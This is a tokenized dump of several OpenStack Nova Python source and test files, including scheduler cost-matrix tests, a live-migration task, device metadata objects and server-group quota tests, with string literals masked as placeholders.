instance1 } <EOL> fake_hosts [ <NUM_LIT:2> ] . instances = { instance2_uuid : instance2 } <EOL> fake_filter_properties = { <EOL> '<STR_LIT>' : self . context . elevated ( ) , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in range ( <NUM_LIT:3> ) ] , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <EOL> [ instance1_uuid , instance2_uuid ] } <EOL> } <EOL> fake_cost = self . cost_classes [ <NUM_LIT:0> ] ( ) <EOL> expected_x_cost_mat = [ <EOL> [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ] <EOL> x_cost_mat = fake_cost . get_extended_cost_matrix ( fake_hosts , <EOL> fake_filter_properties ) <EOL> self . 
assertEqual ( expected_x_cost_mat , x_cost_mat ) <EOL> def test_get_extended_cost_matrix_change_multiplier ( self ) : <EOL> self . flags ( anti_affinity_cost_multiplier = <NUM_LIT:0.5> , <EOL> group = '<STR_LIT>' ) <EOL> fake_hosts = self . _get_fake_hosts ( ) <EOL> instance1 = objects . Instance ( uuid = '<STR_LIT>' ) <EOL> instance2 = objects . Instance ( uuid = '<STR_LIT>' ) <EOL> instance1_uuid = instance1 . uuid <EOL> instance2_uuid = instance2 . uuid <EOL> fake_hosts [ <NUM_LIT:0> ] . instances = { instance1_uuid : instance1 } <EOL> fake_hosts [ <NUM_LIT:2> ] . instances = { instance2_uuid : instance2 } <EOL> fake_filter_properties = { <EOL> '<STR_LIT>' : self . context . elevated ( ) , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in range ( <NUM_LIT:3> ) ] , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <EOL> [ instance1_uuid , instance2_uuid ] } <EOL> } <EOL> fake_cost = self . cost_classes [ <NUM_LIT:0> ] ( ) <EOL> expected_x_cost_mat = [ <EOL> [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:7> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:7> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:6> ] ] <EOL> x_cost_mat = fake_cost . get_extended_cost_matrix ( fake_hosts , <EOL> fake_filter_properties ) <EOL> self . assertEqual ( expected_x_cost_mat , x_cost_mat ) <EOL> def test_get_extended_cost_matrix_zero_multiplier ( self ) : <EOL> self . flags ( anti_affinity_cost_multiplier = <NUM_LIT:0> , group = '<STR_LIT>' ) <EOL> fake_hosts = self . _get_fake_hosts ( ) <EOL> instance = objects . Instance ( uuid = '<STR_LIT>' ) <EOL> instance_uuid = instance . uuid <EOL> fake_hosts [ <NUM_LIT:1> ] . instances = { instance_uuid : instance } <EOL> fake_filter_properties = { <EOL> '<STR_LIT>' : self . context . 
elevated ( ) , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in range ( <NUM_LIT:3> ) ] , <EOL> '<STR_LIT>' : { '<STR_LIT>' : instance_uuid } <EOL> } <EOL> fake_cost = self . cost_classes [ <NUM_LIT:0> ] ( ) <EOL> expected_x_cost_mat = [ <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] <EOL> x_cost_mat = fake_cost . get_extended_cost_matrix ( fake_hosts , <EOL> fake_filter_properties ) <EOL> self . assertEqual ( expected_x_cost_mat , x_cost_mat ) <EOL> def test_get_extended_cost_matrix_no_instance_list ( self ) : <EOL> fake_hosts = self . _get_fake_hosts ( ) <EOL> fake_filter_properties = { <EOL> '<STR_LIT>' : self . context . elevated ( ) , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in range ( <NUM_LIT:3> ) ] , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } <EOL> } <EOL> fake_cost = self . cost_classes [ <NUM_LIT:0> ] ( ) <EOL> expected_x_cost_mat = [ <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ] <EOL> x_cost_mat = fake_cost . get_extended_cost_matrix ( fake_hosts , <EOL> fake_filter_properties ) <EOL> self . assertEqual ( expected_x_cost_mat , x_cost_mat ) <EOL> def test_get_extended_cost_matrix_no_hint ( self ) : <EOL> fake_hosts = self . _get_fake_hosts ( ) <EOL> fake_filter_properties = { <EOL> '<STR_LIT>' : self . context . elevated ( ) , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in range ( <NUM_LIT:3> ) ] , <EOL> '<STR_LIT>' : { } <EOL> } <EOL> fake_cost = self . 
cost_classes [ <NUM_LIT:0> ] ( ) <EOL> expected_x_cost_mat = [ <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] <EOL> x_cost_mat = fake_cost . get_extended_cost_matrix ( fake_hosts , <EOL> fake_filter_properties ) <EOL> self . assertEqual ( expected_x_cost_mat , x_cost_mat ) </s>
<s> tag = { <EOL> "<STR_LIT:type>" : "<STR_LIT:string>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> update_all = { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:type>" : "<STR_LIT:string>" <EOL> } <EOL> } , <EOL> "<STR_LIT:title>" : "<STR_LIT>" , <EOL> "<STR_LIT:type>" : "<STR_LIT:object>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> } <EOL> } , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : False <EOL> } <EOL> update = { <EOL> "<STR_LIT:title>" : "<STR_LIT>" , <EOL> "<STR_LIT:type>" : "<STR_LIT:null>" , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : False <EOL> } </s>
<s> from oslo_log import log as logging <EOL> import oslo_messaging as messaging <EOL> import six <EOL> from nova . compute import power_state <EOL> from nova . conductor . tasks import base <EOL> import nova . conf <EOL> from nova import exception <EOL> from nova . i18n import _ <EOL> from nova import objects <EOL> from nova . scheduler import utils as scheduler_utils <EOL> from nova import utils <EOL> LOG = logging . getLogger ( __name__ ) <EOL> CONF = nova . conf . CONF <EOL> class LiveMigrationTask ( base . TaskBase ) : <EOL> def __init__ ( self , context , instance , destination , <EOL> block_migration , disk_over_commit , migration , compute_rpcapi , <EOL> servicegroup_api , scheduler_client , request_spec = None ) : <EOL> super ( LiveMigrationTask , self ) . __init__ ( context , instance ) <EOL> self . destination = destination <EOL> self . block_migration = block_migration <EOL> self . disk_over_commit = disk_over_commit <EOL> self . migration = migration <EOL> self . source = instance . host <EOL> self . migrate_data = None <EOL> self . compute_rpcapi = compute_rpcapi <EOL> self . servicegroup_api = servicegroup_api <EOL> self . scheduler_client = scheduler_client <EOL> self . request_spec = request_spec <EOL> def _execute ( self ) : <EOL> self . _check_instance_is_active ( ) <EOL> self . _check_host_is_up ( self . source ) <EOL> if not self . destination : <EOL> self . destination = self . _find_destination ( ) <EOL> self . migration . dest_compute = self . destination <EOL> self . migration . save ( ) <EOL> else : <EOL> self . _check_requested_destination ( ) <EOL> return self . compute_rpcapi . live_migration ( self . context , <EOL> host = self . source , <EOL> instance = self . instance , <EOL> dest = self . destination , <EOL> block_migration = self . block_migration , <EOL> migration = self . migration , <EOL> migrate_data = self . migrate_data ) <EOL> def rollback ( self ) : <EOL> pass <EOL> def _check_instance_is_active ( self ) : <EOL> if self . 
instance . power_state not in ( power_state . RUNNING , <EOL> power_state . PAUSED ) : <EOL> raise exception . InstanceInvalidState ( <EOL> instance_uuid = self . instance . uuid , <EOL> attr = '<STR_LIT>' , <EOL> state = self . instance . power_state , <EOL> method = '<STR_LIT>' ) <EOL> def _check_host_is_up ( self , host ) : <EOL> try : <EOL> service = objects . Service . get_by_compute_host ( self . context , host ) <EOL> except exception . NotFound : <EOL> raise exception . ComputeServiceUnavailable ( host = host ) <EOL> if not self . servicegroup_api . service_is_up ( service ) : <EOL> raise exception . ComputeServiceUnavailable ( host = host ) <EOL> def _check_requested_destination ( self ) : <EOL> self . _check_destination_is_not_source ( ) <EOL> self . _check_host_is_up ( self . destination ) <EOL> self . _check_destination_has_enough_memory ( ) <EOL> self . _check_compatible_with_source_hypervisor ( self . destination ) <EOL> self . _call_livem_checks_on_host ( self . destination ) <EOL> def _check_destination_is_not_source ( self ) : <EOL> if self . destination == self . source : <EOL> raise exception . UnableToMigrateToSelf ( <EOL> instance_id = self . instance . uuid , host = self . destination ) <EOL> def _check_destination_has_enough_memory ( self ) : <EOL> compute = self . _get_compute_info ( self . destination ) <EOL> free_ram_mb = compute . free_ram_mb <EOL> total_ram_mb = compute . memory_mb <EOL> mem_inst = self . instance . memory_mb <EOL> ram_ratio = compute . ram_allocation_ratio <EOL> avail = total_ram_mb * ram_ratio - ( total_ram_mb - free_ram_mb ) <EOL> if not mem_inst or avail <= mem_inst : <EOL> instance_uuid = self . instance . uuid <EOL> dest = self . destination <EOL> reason = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> raise exception . 
MigrationPreCheckError ( reason = reason % dict ( <EOL> instance_uuid = instance_uuid , dest = dest , avail = avail , <EOL> mem_inst = mem_inst ) ) <EOL> def _get_compute_info ( self , host ) : <EOL> return objects . ComputeNode . get_first_node_by_host_for_old_compat ( <EOL> self . context , host ) <EOL> def _check_compatible_with_source_hypervisor ( self , destination ) : <EOL> source_info = self . _get_compute_info ( self . source ) <EOL> destination_info = self . _get_compute_info ( destination ) <EOL> source_type = source_info . hypervisor_type <EOL> destination_type = destination_info . hypervisor_type <EOL> if source_type != destination_type : <EOL> raise exception . InvalidHypervisorType ( ) <EOL> source_version = source_info . hypervisor_version <EOL> destination_version = destination_info . hypervisor_version <EOL> if source_version > destination_version : <EOL> raise exception . DestinationHypervisorTooOld ( ) <EOL> def _call_livem_checks_on_host ( self , destination ) : <EOL> try : <EOL> self . migrate_data = self . compute_rpcapi . check_can_live_migrate_destination ( self . context , self . instance , <EOL> destination , self . block_migration , self . disk_over_commit ) <EOL> except messaging . MessagingTimeout : <EOL> msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT:%s>" ) % destination <EOL> raise exception . MigrationPreCheckError ( msg ) <EOL> def _find_destination ( self ) : <EOL> attempted_hosts = [ self . source ] <EOL> image = utils . get_image_from_system_metadata ( <EOL> self . instance . system_metadata ) <EOL> filter_properties = { '<STR_LIT>' : attempted_hosts } <EOL> request_spec = { '<STR_LIT>' : { '<STR_LIT>' : self . instance . uuid } } <EOL> scheduler_utils . setup_instance_group ( self . context , request_spec , <EOL> filter_properties ) <EOL> if not self . request_spec : <EOL> request_spec = objects . RequestSpec . from_components ( <EOL> self . context , self . instance . uuid , image , <EOL> self . instance . flavor , self . instance . 
numa_topology , <EOL> self . instance . pci_requests , <EOL> filter_properties , None , self . instance . availability_zone <EOL> ) <EOL> else : <EOL> request_spec = self . request_spec <EOL> request_spec . reset_forced_destinations ( ) <EOL> host = None <EOL> while host is None : <EOL> self . _check_not_over_max_retries ( attempted_hosts ) <EOL> request_spec . ignore_hosts = attempted_hosts <EOL> try : <EOL> host = self . scheduler_client . select_destinations ( self . context , <EOL> request_spec ) [ <NUM_LIT:0> ] [ '<STR_LIT:host>' ] <EOL> except messaging . RemoteError as ex : <EOL> raise exception . MigrationSchedulerRPCError ( <EOL> reason = six . text_type ( ex ) ) <EOL> try : <EOL> self . _check_compatible_with_source_hypervisor ( host ) <EOL> self . _call_livem_checks_on_host ( host ) <EOL> except ( exception . Invalid , exception . MigrationPreCheckError ) as e : <EOL> LOG . debug ( "<STR_LIT>" , <EOL> { "<STR_LIT:host>" : host , "<STR_LIT:e>" : e } ) <EOL> attempted_hosts . append ( host ) <EOL> host = None <EOL> return host <EOL> def _check_not_over_max_retries ( self , attempted_hosts ) : <EOL> if CONF . migrate_max_retries == - <NUM_LIT:1> : <EOL> return <EOL> retries = len ( attempted_hosts ) - <NUM_LIT:1> <EOL> if retries > CONF . migrate_max_retries : <EOL> if self . migration : <EOL> self . migration . status = '<STR_LIT>' <EOL> self . migration . save ( ) <EOL> msg = ( _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> % { '<STR_LIT>' : retries , <EOL> '<STR_LIT>' : self . instance . uuid } ) <EOL> raise exception . MaxRetriesExceeded ( reason = msg ) </s>
<s> from oslo_service import sslutils <EOL> def register_opts ( conf ) : <EOL> sslutils . register_opts ( conf ) <EOL> def list_opts ( ) : <EOL> return sslutils . list_opts ( ) </s>
<s> """<STR_LIT>""" <EOL> from oslo_log import log as logging <EOL> from nova import exception <EOL> from nova . i18n import _ , _LW <EOL> from nova . keymgr import mock_key_mgr <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class SingleKeyManager ( mock_key_mgr . MockKeyManager ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> LOG . warning ( _LW ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> super ( SingleKeyManager , self ) . __init__ ( ) <EOL> self . key_id = '<STR_LIT>' <EOL> self . key = self . _generate_key ( key_length = <NUM_LIT> ) <EOL> self . keys [ self . key_id ] = self . key <EOL> def _generate_hex_key ( self , ** kwargs ) : <EOL> key_length = kwargs . get ( '<STR_LIT>' , <NUM_LIT> ) <EOL> return b'<STR_LIT:0>' * ( key_length // <NUM_LIT:4> ) <EOL> def _generate_key_id ( self ) : <EOL> return self . key_id <EOL> def store_key ( self , ctxt , key , ** kwargs ) : <EOL> if key != self . key : <EOL> raise exception . KeyManagerError ( <EOL> reason = _ ( "<STR_LIT>" ) ) <EOL> return super ( SingleKeyManager , self ) . store_key ( ctxt , key , ** kwargs ) <EOL> def delete_key ( self , ctxt , key_id , ** kwargs ) : <EOL> if ctxt is None : <EOL> raise exception . Forbidden ( ) <EOL> if key_id != self . key_id : <EOL> raise exception . KeyManagerError ( <EOL> reason = _ ( "<STR_LIT>" ) ) <EOL> LOG . warning ( _LW ( "<STR_LIT>" ) , key_id ) </s>
<s> from nova . objects import base <EOL> from nova . objects import fields <EOL> @ base . NovaObjectRegistry . register_if ( False ) <EOL> class DeviceBus ( base . NovaObject ) : <EOL> VERSION = '<STR_LIT:1.0>' <EOL> @ base . NovaObjectRegistry . register <EOL> class PCIDeviceBus ( DeviceBus ) : <EOL> VERSION = '<STR_LIT:1.0>' <EOL> fields = { <EOL> '<STR_LIT:address>' : fields . PCIAddressField ( ) , <EOL> } <EOL> @ base . NovaObjectRegistry . register <EOL> class USBDeviceBus ( DeviceBus ) : <EOL> VERSION = '<STR_LIT:1.0>' <EOL> fields = { <EOL> '<STR_LIT:address>' : fields . USBAddressField ( ) , <EOL> } <EOL> @ base . NovaObjectRegistry . register <EOL> class SCSIDeviceBus ( DeviceBus ) : <EOL> VERSION = '<STR_LIT:1.0>' <EOL> fields = { <EOL> '<STR_LIT:address>' : fields . SCSIAddressField ( ) , <EOL> } <EOL> @ base . NovaObjectRegistry . register <EOL> class IDEDeviceBus ( DeviceBus ) : <EOL> VERSION = '<STR_LIT:1.0>' <EOL> fields = { <EOL> '<STR_LIT:address>' : fields . IDEAddressField ( ) , <EOL> } <EOL> @ base . NovaObjectRegistry . register <EOL> class DeviceMetadata ( base . NovaObject ) : <EOL> VERSION = '<STR_LIT:1.0>' <EOL> fields = { <EOL> '<STR_LIT>' : fields . ObjectField ( "<STR_LIT>" , subclasses = True ) , <EOL> '<STR_LIT>' : fields . ListOfStringsField ( ) , <EOL> } <EOL> @ base . NovaObjectRegistry . register <EOL> class NetworkInterfaceMetadata ( DeviceMetadata ) : <EOL> VERSION = '<STR_LIT:1.0>' <EOL> fields = { <EOL> '<STR_LIT>' : fields . MACAddressField ( ) , <EOL> } <EOL> @ base . NovaObjectRegistry . register <EOL> class DiskMetadata ( DeviceMetadata ) : <EOL> VERSION = '<STR_LIT:1.0>' <EOL> fields = { <EOL> '<STR_LIT>' : fields . StringField ( nullable = True ) , <EOL> '<STR_LIT:path>' : fields . StringField ( nullable = True ) , <EOL> } <EOL> @ base . NovaObjectRegistry . register <EOL> class DeviceMetadataList ( base . ObjectListBase , base . NovaObject ) : <EOL> VERSION = '<STR_LIT:1.0>' <EOL> fields = { <EOL> '<STR_LIT>' : fields . 
ListOfObjectsField ( '<STR_LIT>' , <EOL> subclasses = True ) , <EOL> } </s>
<s> from oslo_config import cfg <EOL> import nova . scheduler . utils <EOL> import nova . servicegroup <EOL> from nova import test <EOL> from nova . tests import fixtures as nova_fixtures <EOL> from nova . tests . functional . api import client <EOL> import nova . tests . unit . image . fake <EOL> from nova . tests . unit import policy_fixture <EOL> CONF = cfg . CONF <EOL> class TestServerValidation ( test . TestCase ) : <EOL> REQUIRES_LOCKING = True <EOL> microversion = None <EOL> def setUp ( self ) : <EOL> super ( TestServerValidation , self ) . setUp ( ) <EOL> self . useFixture ( policy_fixture . RealPolicyFixture ( ) ) <EOL> api_fixture = self . useFixture ( nova_fixtures . OSAPIFixture ( <EOL> api_version = '<STR_LIT>' ) ) <EOL> nova . tests . unit . image . fake . stub_out_image_service ( self ) <EOL> self . addCleanup ( nova . tests . unit . image . fake . FakeImageService_reset ) <EOL> self . api = api_fixture . api <EOL> self . image_id = self . api . get_images ( ) [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] <EOL> self . flavor_id = self . api . get_flavors ( ) [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] <EOL> def test_name_validation ( self ) : <EOL> """<STR_LIT>""" <EOL> server = dict ( name = '<STR_LIT>' , <EOL> imageRef = self . image_id , <EOL> flavorRef = self . flavor_id ) <EOL> server_args = { '<STR_LIT>' : server } <EOL> self . assertRaises ( client . OpenStackApiException , self . api . post_server , <EOL> server_args ) </s>
<s> from oslo_config import cfg <EOL> from oslo_utils import uuidutils <EOL> import webob <EOL> from nova . api . openstack . compute . legacy_v2 . contrib import server_groups <EOL> from nova . api . openstack . compute import server_groups as sg_v21 <EOL> from nova . api . openstack import extensions <EOL> from nova import context <EOL> from nova import quota <EOL> from nova import test <EOL> from nova . tests . unit . api . openstack import fakes <EOL> from nova . tests import uuidsentinel as uuids <EOL> CONF = cfg . CONF <EOL> class AttrDict ( dict ) : <EOL> def __getattr__ ( self , k ) : <EOL> return self [ k ] <EOL> def server_group_template ( ** kwargs ) : <EOL> sgroup = kwargs . copy ( ) <EOL> sgroup . setdefault ( '<STR_LIT:name>' , '<STR_LIT:test>' ) <EOL> return sgroup <EOL> def server_group_db ( sg ) : <EOL> attrs = sg . copy ( ) <EOL> if '<STR_LIT:id>' in attrs : <EOL> attrs [ '<STR_LIT>' ] = attrs . pop ( '<STR_LIT:id>' ) <EOL> if '<STR_LIT>' in attrs : <EOL> policies = attrs . pop ( '<STR_LIT>' ) <EOL> attrs [ '<STR_LIT>' ] = policies <EOL> else : <EOL> attrs [ '<STR_LIT>' ] = [ ] <EOL> if '<STR_LIT>' in attrs : <EOL> members = attrs . pop ( '<STR_LIT>' ) <EOL> attrs [ '<STR_LIT>' ] = members <EOL> else : <EOL> attrs [ '<STR_LIT>' ] = [ ] <EOL> if '<STR_LIT>' in attrs : <EOL> attrs [ '<STR_LIT>' ] = attrs . pop ( '<STR_LIT>' ) <EOL> else : <EOL> attrs [ '<STR_LIT>' ] = { } <EOL> attrs [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> attrs [ '<STR_LIT>' ] = None <EOL> attrs [ '<STR_LIT>' ] = None <EOL> attrs [ '<STR_LIT>' ] = None <EOL> if '<STR_LIT>' not in attrs : <EOL> attrs [ '<STR_LIT>' ] = fakes . FAKE_USER_ID <EOL> if '<STR_LIT>' not in attrs : <EOL> attrs [ '<STR_LIT>' ] = fakes . FAKE_PROJECT_ID <EOL> attrs [ '<STR_LIT:id>' ] = <NUM_LIT:7> <EOL> return AttrDict ( attrs ) <EOL> class ServerGroupQuotasTestV21 ( test . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( ServerGroupQuotasTestV21 , self ) . setUp ( ) <EOL> self . 
_setup_controller ( ) <EOL> self . req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> def _setup_controller ( self ) : <EOL> self . controller = sg_v21 . ServerGroupController ( ) <EOL> def _setup_quotas ( self ) : <EOL> pass <EOL> def _assert_server_groups_in_use ( self , project_id , user_id , in_use ) : <EOL> ctxt = context . get_admin_context ( ) <EOL> result = quota . QUOTAS . get_user_quotas ( ctxt , project_id , user_id ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] [ '<STR_LIT>' ] , in_use ) <EOL> def test_create_server_group_normal ( self ) : <EOL> self . _setup_quotas ( ) <EOL> sgroup = server_group_template ( ) <EOL> policies = [ '<STR_LIT>' ] <EOL> sgroup [ '<STR_LIT>' ] = policies <EOL> res_dict = self . controller . create ( self . req , <EOL> body = { '<STR_LIT>' : sgroup } ) <EOL> self . assertEqual ( res_dict [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] , '<STR_LIT:test>' ) <EOL> self . assertTrue ( uuidutils . is_uuid_like ( res_dict [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] ) ) <EOL> self . assertEqual ( res_dict [ '<STR_LIT>' ] [ '<STR_LIT>' ] , policies ) <EOL> def test_create_server_group_quota_limit ( self ) : <EOL> self . _setup_quotas ( ) <EOL> sgroup = server_group_template ( ) <EOL> policies = [ '<STR_LIT>' ] <EOL> sgroup [ '<STR_LIT>' ] = policies <EOL> for i in range ( CONF . quota_server_groups ) : <EOL> self . controller . create ( self . req , body = { '<STR_LIT>' : sgroup } ) <EOL> self . assertRaises ( webob . exc . HTTPForbidden , <EOL> self . controller . create , <EOL> self . req , body = { '<STR_LIT>' : sgroup } ) <EOL> def test_delete_server_group_by_admin ( self ) : <EOL> self . _setup_quotas ( ) <EOL> sgroup = server_group_template ( ) <EOL> policies = [ '<STR_LIT>' ] <EOL> sgroup [ '<STR_LIT>' ] = policies <EOL> res = self . controller . create ( self . req , body = { '<STR_LIT>' : sgroup } ) <EOL> sg_id = res [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> context = self . req . environ [ '<STR_LIT>' ] <EOL> self . 
_assert_server_groups_in_use ( context . project_id , <EOL> context . user_id , <NUM_LIT:1> ) <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' , use_admin_context = True ) <EOL> self . controller . delete ( req , sg_id ) <EOL> self . _assert_server_groups_in_use ( context . project_id , <EOL> context . user_id , <NUM_LIT:0> ) <EOL> def test_delete_server_group_by_id ( self ) : <EOL> self . _setup_quotas ( ) <EOL> sg = server_group_template ( id = uuids . sg1_id ) <EOL> self . called = False <EOL> def server_group_delete ( context , id ) : <EOL> self . called = True <EOL> def return_server_group ( context , group_id ) : <EOL> self . assertEqual ( sg [ '<STR_LIT:id>' ] , group_id ) <EOL> return server_group_db ( sg ) <EOL> self . stub_out ( '<STR_LIT>' , <EOL> server_group_delete ) <EOL> self . stub_out ( '<STR_LIT>' , <EOL> return_server_group ) <EOL> resp = self . controller . delete ( self . req , uuids . sg1_id ) <EOL> self . assertTrue ( self . called ) <EOL> if isinstance ( self . controller , sg_v21 . ServerGroupController ) : <EOL> status_int = self . controller . delete . wsgi_code <EOL> else : <EOL> status_int = resp . status_int <EOL> self . assertEqual ( <NUM_LIT> , status_int ) <EOL> class ServerGroupQuotasTestV2 ( ServerGroupQuotasTestV21 ) : <EOL> def _setup_controller ( self ) : <EOL> self . ext_mgr = self . mox . CreateMock ( extensions . ExtensionManager ) <EOL> self . controller = server_groups . ServerGroupController ( self . ext_mgr ) <EOL> def _setup_quotas ( self ) : <EOL> self . ext_mgr . is_loaded ( '<STR_LIT>' ) . MultipleTimes ( ) . AndReturn ( True ) <EOL> self . mox . ReplayAll ( ) </s>
<s> import mock <EOL> from mox3 import mox <EOL> from oslo_utils import fixture as utils_fixture <EOL> from oslo_utils import timeutils <EOL> from nova . compute import claims <EOL> from nova . compute import task_states <EOL> from nova . compute import vm_states <EOL> import nova . conf <EOL> from nova import db <EOL> from nova import objects <EOL> from nova . tests . unit . compute import test_compute <EOL> from nova . tests . unit . image import fake as fake_image <EOL> from nova . tests import uuidsentinel as uuids <EOL> CONF = nova . conf . CONF <EOL> def _fake_resources ( ) : <EOL> resources = { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:20> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:20> , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : <NUM_LIT:0> <EOL> } <EOL> return objects . ComputeNode ( ** resources ) <EOL> class ShelveComputeManagerTestCase ( test_compute . BaseTestCase ) : <EOL> def _shelve_instance ( self , shelved_offload_time , clean_shutdown = True ) : <EOL> CONF . set_override ( '<STR_LIT>' , shelved_offload_time ) <EOL> host = '<STR_LIT>' <EOL> instance = self . _create_fake_instance_obj ( params = { '<STR_LIT:host>' : host } ) <EOL> image_id = '<STR_LIT>' <EOL> host = '<STR_LIT>' <EOL> self . useFixture ( utils_fixture . TimeFixture ( ) ) <EOL> instance . task_state = task_states . SHELVING <EOL> instance . save ( ) <EOL> self . mox . StubOutWithMock ( self . compute , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute . driver , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute . driver , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute . network_api , <EOL> '<STR_LIT>' ) <EOL> self . compute . _notify_about_instance_usage ( self . context , instance , <EOL> '<STR_LIT>' ) <EOL> if clean_shutdown : <EOL> self . compute . 
driver . power_off ( instance , <EOL> CONF . shutdown_timeout , <EOL> self . compute . SHUTDOWN_RETRY_INTERVAL ) <EOL> else : <EOL> self . compute . driver . power_off ( instance , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . compute . _get_power_state ( self . context , <EOL> instance ) . AndReturn ( <NUM_LIT> ) <EOL> if CONF . shelved_offload_time == <NUM_LIT:0> : <EOL> self . compute . network_api . cleanup_instance_network_on_host ( <EOL> self . context , instance , instance . host ) <EOL> self . compute . driver . snapshot ( self . context , instance , '<STR_LIT>' , <EOL> mox . IgnoreArg ( ) ) <EOL> tracking = { '<STR_LIT>' : instance . vm_state } <EOL> def check_save ( expected_task_state = None ) : <EOL> self . assertEqual ( <NUM_LIT> , instance . power_state ) <EOL> if tracking [ '<STR_LIT>' ] == vm_states . ACTIVE : <EOL> if CONF . shelved_offload_time == <NUM_LIT:0> : <EOL> self . assertEqual ( task_states . SHELVING_OFFLOADING , <EOL> instance . task_state ) <EOL> else : <EOL> self . assertIsNone ( instance . task_state ) <EOL> self . assertEqual ( vm_states . SHELVED , instance . vm_state ) <EOL> self . assertEqual ( [ task_states . SHELVING , <EOL> task_states . SHELVING_IMAGE_UPLOADING ] , <EOL> expected_task_state ) <EOL> self . assertIn ( '<STR_LIT>' , instance . system_metadata ) <EOL> self . assertEqual ( image_id , <EOL> instance . system_metadata [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( host , <EOL> instance . system_metadata [ '<STR_LIT>' ] ) <EOL> tracking [ '<STR_LIT>' ] = instance . vm_state <EOL> elif ( tracking [ '<STR_LIT>' ] == vm_states . SHELVED and <EOL> CONF . shelved_offload_time == <NUM_LIT:0> ) : <EOL> self . assertIsNone ( instance . host ) <EOL> self . assertIsNone ( instance . node ) <EOL> self . assertIsNone ( instance . task_state ) <EOL> self . assertEqual ( vm_states . SHELVED_OFFLOADED , <EOL> instance . vm_state ) <EOL> self . assertEqual ( [ task_states . SHELVING , 